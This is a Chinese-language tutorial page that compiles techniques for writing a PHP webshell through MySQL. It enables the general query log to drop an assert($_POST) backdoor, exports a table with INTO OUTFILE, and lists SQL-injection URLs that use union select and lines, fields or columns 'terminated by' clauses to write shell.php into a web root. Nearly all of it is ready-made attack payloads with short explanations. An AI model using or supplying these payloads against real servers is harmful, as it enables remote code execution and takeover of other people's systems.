当前位置:Gxlcms > 数据库问题 > Mysql Get Shell 姿势整理

Mysql Get Shell 姿势整理

时间:2021-07-01 10:21:17 帮助过:21人阅读

日志写shell

  1. <code>show variables like ‘general_log‘; -- 查看日志是否开启
  2. set global general_log=on; -- 开启日志功能
  3. show variables like ‘general_log_file‘; -- 看看日志文件保存位置
  4. set global general_log_file=‘tmp/general.lg‘; -- 设置日志文件保存位置
  5. show variables like ‘log_output‘; -- 看看日志输出类型 table或file
  6. set global log_output=‘table‘; -- 设置输出类型为 table
  7. set global log_output=‘file‘; -- 设置输出类型为file
  8. SELECT‘<?php assert($_POST["cmd"]);?>‘; --通过日志来写入一句话:
  9. </code>

导出shell

  1. <code>use test; --连接 test 数据库。
  2. drop table if exists sy; --搜索并删除存在的 sy 这个表。
  3. create table sy(eel text not null); --建立这个sy表,然后里面一个eel的字段。
  4. insert into sy(eel) values (‘<?php phpinfo(); ?>’); --写进入一句话
  5. SELECT eel FROM sy INTO OUTFILE ‘G:/2.txt’; --把这句话再导出来。
  6. DROP TABLE sy; --删除这个表。
  7. </code>

uniom select 写入

  1. <code>http://a.com/a.php?id=@ union select 1,2,3,4,‘<?php phpinfo() ?>‘ into outfile ‘/web/shell.php‘
  2. http://a.com/a.php?id=@ union select 1,2,3,4,‘<?php phpinfo() ?>‘ into dumpfile ‘/web/shell.php‘
  3. </code>

注意:

在windows下,位置的分隔符为 /(斜杠)。

lines terminated by 写入

  1. <code>http://a.com/a.php?id=1 into outfile ‘/web/shell.php‘ lines terminated by ‘<?php phpinfo() ?>‘;
  2. http://a.com/a.php?id=1 limit 1 into outfile ‘/web/shell.php‘ lines terminated by ‘<?php phpinfo() ?>‘;
  3. </code>

注入原理:

通过select语句查询的内容写入文件,也就是 1 into outfile ‘C:/wamp64/www/work/webshell.php‘ 这样写的原因,然后利用 lines terminated by 语句拼接webshell的内容。lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。

lines starting by 写入

  1. <code>http://a.com/a.php?id=1 into outfile ‘/web/shell.php‘ lines starting by ‘<?php phpinfo() ?>‘;
  2. http://a.com/a.php?id=1 limit 1 into outfile ‘/web/shell.php‘ lines starting by ‘<?php phpinfo() ?>‘;
  3. </code>

注入原理:

利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。

fields terminated by 写入

  1. <code>http://a.com/a.php?id=1 into outfile ‘/web/shell.php‘ fields terminated by ‘<?php phpinfo() ?>‘;
  2. http://a.com/a.php?id=1 limit 1 into outfile ‘/web/shell.php‘ fields terminated by ‘<?php phpinfo() ?>‘;
  3. </code>

注入原理:

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

COLUMNS terminated by 写入

  1. <code>http://a.com/a.php?id=1 into outfile ‘/web/shell.php‘ COLUMNS terminated by ‘<?php phpinfo() ?>‘;
  2. http://a.com/a.php?id=1 limit 1 into outfile ‘/web/shell.php‘ COLUMNS terminated by ‘<?php phpinfo() ?>‘;
  3. </code>

注入原理:

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

Mysql Get Shell 姿势整理

标签:位置   sse   gen   code   use   web   from   amp   like   

人气教程排行